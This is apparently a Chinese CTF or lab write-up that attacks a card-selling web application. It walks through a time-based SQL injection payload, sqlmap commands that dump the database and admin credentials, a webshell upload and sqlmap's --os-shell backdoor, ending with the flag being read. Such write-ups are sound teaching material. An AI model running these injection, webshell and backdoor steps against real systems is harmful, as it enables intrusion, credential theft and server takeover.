目标站点

找注入点

• 浏览一遍网站各个栏目，看看哪个地方存在sql注入
• 在 发卡功能 栏目，
  购买卡密
  卡密查询
• 
  在选择商品是，商品价格，商品库存数据自动跳出，这里应该就有一个数据包，存在数据交互，猜测存在sql注入
• 抓包
  用burp suite抓个包，
  这个数据包，POST方法提交，看看数据包内容
  红圈处，参数提交，可能存在注入点
• 测试
  做个测试，把数据包发送到burp suite的ripeater模块
  在tyid=1 后面加上 and sleep(5) --+,然后go，response延迟显示，说明此处是一个注入点

连接sqlmap(方法一）

• 复制刚才数据包的链接，sqlmap一顿扫描
  

sqlmap -u “http://117.167.136.244:28024/ajax.php?act=selgo” --data “tyid=1” --dbs

sqlmap -u “http://117.167.136.244:28024/ajax.php?act=selgo” --data “tyid=1” -D faka --tables

sqlmap -u “http://117.167.136.244:28024/ajax.php?act=selgo” --data “tyid=1” -D faka -T ayangw_config --columns

(这里一开始本来扫描不出来，后来在sqlmap的columns字典里加了两个字段名 ayangw_k,ayangw_v就可以了）
管理员 admin
密码 MTIzNDU2

**后台地址（使用御剑，下次写写御剑的使用）

从数据库获得管理员账号密码之后，尝试使用 robots.txt ，查看敏感网站信息，结果没有任何反应，在高人（此人姓高）的指点下，使用网站后台扫描工具御剑对网站后台进行扫描：

• 添加需要扫描的 url
  

• 添加字典进行**：

获得网站后台 url,访问，登录成功；

登录后台，上传webshell

• 寻找上传点，找到一个可以上传图片的地方
  
• 测试
  
  再多上传几张
  
  发现不管上传什么图片，地址都是
  http://117.167.136.244:28024/assets/imgs/logo.png
• 上传webshell
  
  
  上传成功，此处猜测webshell地址为
  http://117.167.136.244:28024/assets/imgs/logo.php,尝试访问一下
  空白页，完美！！

连接蚁剑（上篇blog介绍过蚁剑的使用）

• 找flag
  /home/flag
  

方法二（有点牛X！！）

• sqlmap 中的 --os-shell 参数
  sqlmap手册如下（让我觉得多看用户手册有很大好处）
  
• 操作
  sqlmap -u “http://117.167.136.244:28024/ajax.php?act=selgo” --data “tyid=1” --os-shell
  碰到选项是就回车，选择默认选项
  the backdoor (后门)
  os-shell代表已经拿到服务器权限（都不用**后台，找上传点）
  
  相当的刺激啊！！！